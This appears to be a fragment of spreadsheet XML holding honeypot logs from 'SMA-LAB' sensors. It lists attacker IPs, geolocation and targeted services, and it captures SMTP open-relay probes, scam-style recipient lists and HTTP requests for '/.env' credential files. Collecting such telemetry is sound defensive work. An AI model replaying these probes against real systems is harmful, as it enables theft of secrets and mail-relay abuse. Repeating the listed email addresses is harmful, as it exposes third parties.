    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 24 Mar 2025 13:46:38 +0100_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 24 Mar 2025 14:02:40 +0100_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 25 Mar 2025 17:05:20 +0100_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Fri, 28 Mar 2025 16:34:34 +0100_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 30 Mar 2025 21:41:43 +0200_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 7 Apr 2025 14:14:29 +0200_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '94.131.97.67_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 7 Apr 2025 16:14:07 +0200_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '94.131.118.77_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 7 Apr 2025 16:23:17 +0200_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 8 Apr 2025 15:36:25 +0200_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 15 Apr 2025 18:45:37 +0200_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:8d62:ac1</t>
  </si>
  <si>
    <t>eec96c36ba23f7cf91ec29320c3ded92</t>
  </si>
  <si>
    <t>211.23.69.9</t>
  </si>
  <si>
    <t>NA&amp;&amp;211-23-69-9.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:d317:4509</t>
  </si>
  <si>
    <t>298fa19484ff1c2c09375f7be4c7357e</t>
  </si>
  <si>
    <t>202.164.150.6</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>2006-03-08</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (202.164.150.6,64727)}&amp;&amp;{Data_SMB:Incoming connection (202.164.150.6,56002)}</t>
  </si>
  <si>
    <t>::ffff:caa4:9606</t>
  </si>
  <si>
    <t>b7a8fa5602e4555033eb8c976e73a305</t>
  </si>
  <si>
    <t>177.11.121.3</t>
  </si>
  <si>
    <t>Espírito Santo</t>
  </si>
  <si>
    <t>Marataízes</t>
  </si>
  <si>
    <t>Marataizes</t>
  </si>
  <si>
    <t>3457819</t>
  </si>
  <si>
    <t>-21.0433</t>
  </si>
  <si>
    <t>-40.8244</t>
  </si>
  <si>
    <t>262296</t>
  </si>
  <si>
    <t>Windx Telecomunicações</t>
  </si>
  <si>
    <t>::ffff:b10b:7903</t>
  </si>
  <si>
    <t>3cc656bbd0b0f74644432fe3c221edf7</t>
  </si>
  <si>
    <t>49.213.227.145</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>Taichung City</t>
  </si>
  <si>
    <t>Taichung</t>
  </si>
  <si>
    <t>1668399</t>
  </si>
  <si>
    <t>24.1047</t>
  </si>
  <si>
    <t>120.681</t>
  </si>
  <si>
    <t>18049</t>
  </si>
  <si>
    <t>Taiwan Infrastructure Network Technologie</t>
  </si>
  <si>
    <t>tinp</t>
  </si>
  <si>
    <t>::ffff:31d5:e391</t>
  </si>
  <si>
    <t>5474d8f24bf1b3f3da080c969968c4fb</t>
  </si>
  <si>
    <t>113.166.153.76</t>
  </si>
  <si>
    <t>::ffff:71a6:994c</t>
  </si>
  <si>
    <t>Based on the provided data, it appears that an attacker is scanning and probing various services on a network, attempting to identify potential vulnerabilities and gain unauthorized access. The activities observed include: &amp;&amp; It appears that the attacker is attempting to scan and probe various services on a network, likely as part of a reconnaissance phase or to identify vulnerable systems. The data suggests that the attacker is trying to gather information about the target system's configuration, software versions, and potential vulnerabilities.</t>
  </si>
  <si>
    <t>The attacker is trying to fingerprint different services and protocols on the network, sending probes and requests to gather information about the available services and their configurations. &amp;&amp; The attacker may also be attempting to exploit certain services, such as FTP, HTTP, HTTPS, and SMB, by sending malicious requests or credentials.</t>
  </si>
  <si>
    <t>e14f442020069b94ee999fede6d193c4</t>
  </si>
  <si>
    <t>112.196.115.187</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>Mohali</t>
  </si>
  <si>
    <t>6992326</t>
  </si>
  <si>
    <t>30.68</t>
  </si>
  <si>
    <t>76.7221</t>
  </si>
  <si>
    <t>DSL-BROADBAND</t>
  </si>
  <si>
    <t>::ffff:70c4:73bb</t>
  </si>
  <si>
    <t>2d80425337062caeceaf7dbdb81eb946</t>
  </si>
  <si>
    <t>149.106.138.170</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Z</t>
  </si>
  <si>
    <t>Northern District</t>
  </si>
  <si>
    <t>Afula</t>
  </si>
  <si>
    <t>295740</t>
  </si>
  <si>
    <t>32.6091</t>
  </si>
  <si>
    <t>35.2892</t>
  </si>
  <si>
    <t>6810</t>
  </si>
  <si>
    <t>Bezeq- THE ISRAEL TELECOMMUNICATION CORP. LTD.</t>
  </si>
  <si>
    <t>::ffff:956a:8aaa</t>
  </si>
  <si>
    <t>7e2478299f5be3536bf6a43600064eee</t>
  </si>
  <si>
    <t>103.23.206.20</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H5&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H10</t>
  </si>
  <si>
    <t>F</t>
  </si>
  <si>
    <t>Rangpur Division</t>
  </si>
  <si>
    <t>Thakurgaon</t>
  </si>
  <si>
    <t>1185092</t>
  </si>
  <si>
    <t>26.031</t>
  </si>
  <si>
    <t>88.4699</t>
  </si>
  <si>
    <t>134968</t>
  </si>
  <si>
    <t>Maya Cyber World</t>
  </si>
  <si>
    <t>Mizanur Rahman t/a Maya Cyber World</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.23.206.20,58428)}&amp;&amp;{Data_SMB:Incoming connection (103.23.206.20,58492)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:6717:ce14</t>
  </si>
  <si>
    <t>5b8c4e586971c0464bcd2cce9ac1102b</t>
  </si>
  <si>
    <t>179.223.72.12</t>
  </si>
  <si>
    <t>28573</t>
  </si>
  <si>
    <t>Claro NXT Telecomunicacoes Ltda</t>
  </si>
  <si>
    <t>NET Serviços de Comunicação S.A.</t>
  </si>
  <si>
    <t>::ffff:b3df:480c</t>
  </si>
  <si>
    <t>984d76be6958297847a381793d610e41</t>
  </si>
  <si>
    <t>141.98.10.44</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_SMTP_H46&amp;&amp;SMA-LAB_SMTP_H29&amp;&amp;SMA-LAB_SMTP_H12&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H9&amp;&amp;SMA-LAB_SMTP_H35&amp;&amp;SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_H27</t>
  </si>
  <si>
    <t>57976&amp;&amp;25&amp;&amp;NA&amp;&amp;80&amp;&amp;3389</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;GET&amp;&amp;POST</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 3 Feb 2025 03:44:52 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 6 Feb 2025 03:33:48 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '193.57.138.110_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 6 Feb 2025 23:52:01 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;nelsonlonard@gmail.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;attorneyjosephbryant@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;legalcertifieddiplomaticagent@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;victorjunior_1@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;internalrevenueeservice@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;PenFedCreditUnionBank@protonmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;johnflin_sbc@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 8 Feb 2025 06:42:51 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 8 Feb 2025 11:45:55 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 9 Feb 2025 23:35:32 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 12 Feb 2025 04:41:25 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '144.126.148.5_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 12 Feb 2025 08:03:47 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '144.126.148.5_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 16 Feb 2025 11:10:13 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.74.222.213_x000D_
To: spameri@tiscali.it_x000D_
Date: Mon, 17 Feb 2025 04:38:18 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Tue, 18 Feb 2025 23:49:10 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '185.74.222.213_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 20 Feb 2025 04:13:45 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ban-ki-moon2015@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sun, 2 Mar 2025 15:05:06 -0800_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;std63.29282@wisut.ac.th&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;iangudoh@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 19 Mar 2025 13:56:34 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 19 Mar 2025 17:12:32 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;overall4life1@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;imfstoppingorder@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;bettyashley61@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Thu, 20 Mar 2025 21:19:34 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 29 Mar 2025 08:48:09 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 29 Mar 2025 09:03:43 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;brianmoynihan@gov.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;sandradale47@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;KristalinaGeorgieva2019@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;bernardlauwers91@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000D_
To: spameri@tiscali.it_x000D_
Date: Sat, 29 Mar 2025 14:20:09 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 2 Apr 2025 09:05:04 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 2 Apr 2025 09:06:21 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}</t>
  </si>
  <si>
    <t>::ffff:8d62:a2c</t>
  </si>
  <si>
    <t>8b8bb0217e97fa41e70b4d789415e6c8</t>
  </si>
  <si>
    <t>187.106.151.185</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>São José dos Campos</t>
  </si>
  <si>
    <t>3448636</t>
  </si>
  <si>
    <t>-23.1794</t>
  </si>
  <si>
    <t>-45.8869</t>
  </si>
  <si>
    <t>::ffff:bb6a:97b9</t>
  </si>
  <si>
    <t>d149dd5b6f85b1a580f8d914809a7aa8</t>
  </si>
  <si>
    <t>115.188.87.20</t>
  </si>
  <si>
    <t>NA&amp;&amp;115-188-87-20-adsl.sparkbb.co.nz</t>
  </si>
  <si>
    <t>NZ</t>
  </si>
  <si>
    <t>New Zealand</t>
  </si>
  <si>
    <t>AUK</t>
  </si>
  <si>
    <t>Auckland</t>
  </si>
  <si>
    <t>Auckland (Auckland CBD)</t>
  </si>
  <si>
    <t>2193733</t>
  </si>
  <si>
    <t>1010</t>
  </si>
  <si>
    <t>-36.8542</t>
  </si>
  <si>
    <t>174.764</t>
  </si>
  <si>
    <t>4771</t>
  </si>
  <si>
    <t>Spark New Zealand Trading Limited</t>
  </si>
  <si>
    <t>Spark New Zealand Trading Ltd</t>
  </si>
  <si>
    <t>BBA-SPARK</t>
  </si>
  <si>
    <t>::ffff:73bc:5714</t>
  </si>
  <si>
    <t>42c3696aea18ec1915c5966e7908bae6</t>
  </si>
  <si>
    <t>210.222.254.119</t>
  </si>
  <si>
    <t>1999-05-25</t>
  </si>
  <si>
    <t>::ffff:d2de:fe77</t>
  </si>
  <si>
    <t>206bf0c0ef01602978c2c7ddefc61a60</t>
  </si>
  <si>
    <t>49.204.64.101</t>
  </si>
  <si>
    <t>1433&amp;&amp;3306&amp;&amp;25481&amp;&amp;25474</t>
  </si>
  <si>
    <t>Atria Convergence Technologies Ltd.</t>
  </si>
  <si>
    <t>::ffff:31cc:4065</t>
  </si>
  <si>
    <t>35c2a7e8603df2231008991a3867ce3b</t>
  </si>
  <si>
    <t>138.36.83.21</t>
  </si>
  <si>
    <t>NA&amp;&amp;138-36-83-21.netfar.com.br</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>RS</t>
  </si>
  <si>
    <t>Rio Grande do Sul</t>
  </si>
  <si>
    <t>Bento Gonçalves</t>
  </si>
  <si>
    <t>3470073</t>
  </si>
  <si>
    <t>-29.1714</t>
  </si>
  <si>
    <t>-51.5192</t>
  </si>
  <si>
    <t>264571</t>
  </si>
  <si>
    <t>Netfar Informatica Ltda</t>
  </si>
  <si>
    <t>::ffff:8a24:5315</t>
  </si>
  <si>
    <t>5c153019b0df2ccf00839b9a7de2dda8</t>
  </si>
  <si>
    <t>14.224.176.238</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1</t>
  </si>
  <si>
    <t>1433&amp;&amp;59201&amp;&amp;3306</t>
  </si>
  <si>
    <t>::ffff:ee0:b0ee</t>
  </si>
  <si>
    <t>08a0c0ef3ddb7391edafc6b007b7646f</t>
  </si>
  <si>
    <t>205.215.28.224</t>
  </si>
  <si>
    <t>999078</t>
  </si>
  <si>
    <t>22.16</t>
  </si>
  <si>
    <t>113.556</t>
  </si>
  <si>
    <t>Companhia de Telecomunicacoes de Macau SARL</t>
  </si>
  <si>
    <t>NetRail</t>
  </si>
  <si>
    <t>::ffff:cdd7:1ce0</t>
  </si>
  <si>
    <t>87e2dcfe4cff1733118e0bc430bba1ad</t>
  </si>
  <si>
    <t>116.72.105.234</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>7237&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>Uran</t>
  </si>
  <si>
    <t>1253702</t>
  </si>
  <si>
    <t>18.8781</t>
  </si>
  <si>
    <t>72.9392</t>
  </si>
  <si>
    <t>::ffff:7448:69ea</t>
  </si>
  <si>
    <t>3568a4f5ca6f43846ac2d3601223d526</t>
  </si>
  <si>
    <t>111.92.107.5</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18</t>
  </si>
  <si>
    <t>2009-06-23</t>
  </si>
  <si>
    <t>::ffff:6f5c:6b05</t>
  </si>
  <si>
    <t>3ac5bc05d5ab3989fc2dbb470ef8f5a2</t>
  </si>
  <si>
    <t>147.185.132.197</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MT-CPA_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;22&amp;&amp;50868&amp;&amp;51977&amp;&amp;53647&amp;&amp;56109&amp;&amp;443&amp;&amp;6667&amp;&amp;53029&amp;&amp;57252&amp;&amp;56072&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:93b9:84c5</t>
  </si>
  <si>
    <t>514dbef1182958224c6fa89d63845ae3</t>
  </si>
  <si>
    <t>114.25.149.250</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-25-149-250.dynamic-ip.hinet.net</t>
  </si>
  <si>
    <t>::ffff:7219:95fa</t>
  </si>
  <si>
    <t>efd786af8df4338419145bf5caa64163</t>
  </si>
  <si>
    <t>220.231.107.156</t>
  </si>
  <si>
